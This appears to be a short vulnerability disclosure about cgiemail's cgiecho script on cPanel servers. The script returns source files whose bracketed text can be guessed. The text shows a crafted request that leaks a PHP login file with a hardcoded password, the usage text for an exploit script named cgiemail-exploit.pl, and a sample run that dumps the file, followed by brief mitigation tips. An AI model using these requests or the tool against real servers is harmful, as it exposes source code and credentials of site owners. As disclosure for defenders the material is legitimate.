cgiecho a script included with cgiemail will return any file under a websites document root if the file contains square brackets and the text within the brackets is guessable.
cgiemail is currently shipped with cPanel, enabled by default.
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
<?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail
1.6
</EM></BODY>Usage: ./cgiemail-exploit.pl [options] target
Options:
--names Check for names in commer separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--php Check PHP $_SERVER Variables
--batch Number of arguments sent per request (default 10)
--cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agent Set user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&
- if no value is supplied for a variable it will be excluded so expect to see some '$_POST/$_GET' variables with missing []...
- don't use cgiemail...
- disable cgiemail...
- if for whatever reason your stuck on a system with cgiemail the maximum variable length is 255; a long string inside square brackets will return an error.
- don't use square brackets?